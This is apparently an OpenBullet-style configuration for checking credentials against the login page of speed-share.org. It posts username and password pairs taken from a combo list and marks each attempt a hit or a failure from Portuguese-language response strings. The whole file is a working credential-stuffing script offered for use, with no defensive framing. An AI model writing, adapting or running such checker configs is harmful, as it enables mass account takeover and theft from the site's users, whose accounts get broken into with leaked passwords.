[SETTINGS]
{
  "Name": "speedshare",
  "SuggestedBots": 1,
  "LastModified": "2018-11-13T01:46:35.470048+00:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "http://speed-share.org/account-login.php" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&returnto=%2Findex.php" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: speed-share.org" 
  HEADER "Origin: http://speed-share.org" 
  HEADER "Referer: http://speed-share.org/account-login.php?returnto=%2Findex.php" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "ou senha incorreto!" 
  KEYCHAIN Success OR 
    KEY "Desktop do Usuario" 
